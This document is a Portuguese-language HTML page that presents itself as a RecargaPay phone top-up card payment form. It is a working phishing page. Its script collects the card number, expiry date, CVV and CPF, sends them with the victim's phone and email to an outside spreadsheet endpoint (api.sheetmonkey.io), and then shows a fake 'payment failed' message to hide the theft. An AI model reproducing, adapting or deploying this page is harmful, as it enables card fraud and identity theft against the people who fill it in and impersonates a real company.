<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Pagamento com Cartão de Crédito</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f5f5f5;
            margin: 0;
            padding: 0;
        }
        .header {
            background-color: #dda0dd;
            color: white;
            padding: 10px 0;
            text-align: center;
        }
        .header img {
            width: 150px;
            height: auto;
        }
        .container {
            padding: 20px;
        }
        form {
            background-color: white;
            padding: 20px;
            border-radius: 10px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
            text-align: left;
            max-width: 600px;
            margin: auto;
        }
        label {
            display: block;
            margin: 10px 0 5px;
        }
        input[type="text"], input[type="tel"], input[type="email"] {
            width: 100%;
            padding: 10px;
            margin-bottom: 10px;
            border: 1px solid #ddd;
            border-radius: 5px;
            box-sizing: border-box;
        }
        button {
            padding: 10px;
            background-color: #ff69b4;
            color: white;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            width: 100%;
        }
        button:hover {
            background-color: #ff1493;
        }
        .footer {
            background-color: #ff69b4;
            color: white;
            text-align: center;
            padding: 20px 10px;
            margin-top: 20px;
        }
        .footer p {
            margin: 5px 0;
        }
        .receipt {
            background-color: #fff;
            border: 1px solid #ddd;
            border-radius: 5px;
            padding: 10px;
            margin-top: 20px;
        }
        .receipt p {
            margin: 5px 0;
        }
        .receipt p span {
            display: inline-block;
            width: 50%;
            box-sizing: border-box;
        }
        .floating-message {
            position: fixed;
            top: 20px;
            left: 50%;
            transform: translateX(-50%);
            background-color: #ff69b4;
            color: white;
            padding: 10px 20px;
            border-radius: 5px;
            display: none;
            z-index: 1000;
        }
    </style>
</head>
<body>
    <div class="header">
        <img src="Operadoras.png" alt="Operadoras">
    </div>

    <div class="container">
        <form id="cartao-form" method="POST" onsubmit="processarDados(event)">
            <label for="numero-cartao">Número do Cartão:</label>
            <input type="text" id="numero-cartao" name="numero-cartao" placeholder="1234 5678 9012 3456" required>

            <label for="validade">Validade:</label>
            <input type="text" id="validade" name="validade" placeholder="MM/AA" required>

            <label for="cvv">CVV:</label>
            <input type="text" id="cvv" name="cvv" placeholder="123" required>

            <label for="cpf">CPF:</label>
            <input type="text" id="cpf" name="cpf" placeholder="123.456.789-00" required>

            <label for="recarga-info">Valor da Recarga:</label>
            <p id="recarga-info"></p>
            
            <button type="submit">Confirmar Pagamento</button>
        </form>
        
        <div class="receipt">
            <p><span>Telefone:</span> <span id="recarga-telefone"></span></p>
            <p><span>Email:</span> <span id="recarga-email"></span></p>
        </div>
    </div>

    <div class="footer">
        <p>CNPJ: 11.275.560/0001-75. Endereço: Avenida Brigadeiro Faria Lima, nº 4055, 1º andar, sala 1-114, Espaço WeWork - Sala RecargaPay, Itaim Bibi, São Paulo/SP, CEP 04538-133</p>
        <p>Copyright ©2024 RecargaPay Instituição de Pagamento Ltda. Todos os direitos reservados.</p>
    </div>

    <div class="floating-message" id="floating-message">Processando...</div>

    <script>
        document.getElementById('numero-cartao').addEventListener('input', function (event) {
            let input = event.target;
            let value = input.value.replace(/\D/g, '').substring(0, 16);
            let formattedValue = value.replace(/(\d{4})(?=\d)/g, '$1 ');
            input.value = formattedValue;
        });

        document.getElementById('validade').addEventListener('input', function (event) {
            let input = event.target;
            let value = input.value.replace(/\D/g, '').substring(0, 4);
            let formattedValue = value.replace(/(\d{2})(\d{1,2})/, '$1/$2');
            input.value = formattedValue;
        });

        document.getElementById('cvv').addEventListener('input', function (event) {
            let input = event.target;
            let value = input.value.replace(/\D/g, '').substring(0, 3);
            input.value = value;
        });

        document.getElementById('cpf').addEventListener('input', function (event) {
            let input = event.target;
            let value = input.value.replace(/\D/g, '').substring(0, 11);
            let formattedValue = value.replace(/(\d{3})(\d{3})(\d{3})(\d{1,2})/, '$1.$2.$3-$4');
            input.value = formattedValue;
        });

        function getQueryParams() {
            let params = {};
            window.location.search.replace(/[?&]+([^=&]+)=([^&]*)/gi, function(str, key, value) {
                params[key] = decodeURIComponent(value);
            });
            return params;
        }

        const params = getQueryParams();
        const recargaInfo = document.getElementById('recarga-info');
        const recargaTelefone = document.getElementById('recarga-telefone');
        const recargaEmail = document.getElementById('recarga-email');
        recargaInfo.textContent = `${params.valor || ''}`;
        recargaTelefone.textContent = `${params.telefone || ''}`;
        recargaEmail.textContent = `${params.email || ''}`;

        function exibirMensagem(mensagem) {
            const floatingMessage = document.getElementById('floating-message');
            floatingMessage.textContent = mensagem;
            floatingMessage.style.display = 'block';
            setTimeout(() => {
                floatingMessage.style.display = 'none';
            }, 1000);
        }

        function processarDados(event) {
            event.preventDefault();

            const form = document.getElementById('cartao-form');
            const formData = new FormData(form);

            formData.append('recarga-info', params.valor);
            formData.append('telefone', params.telefone);
            formData.append('email', params.email);

            exibirMensagem('Processando...');

            fetch('https://api.sheetmonkey.io/form/fwJGENGNpUDyrLRPu9gsgg', {
                method: 'POST',
                body: formData
            }).then(response => {
                setTimeout(() => {
                    exibirMensagem('Falha no pagamento.');
                    setTimeout(() => {
                        window.history.back();
                    }, 1000);
                }, 1000);
            }).catch(error => {
                console.error('Erro:', error);
                exibirMensagem('Falha no pagamento.');
                setTimeout(() => {
                    window.history.back();
                }, 1000);
            });
        }
    </script>
</body>
</html>
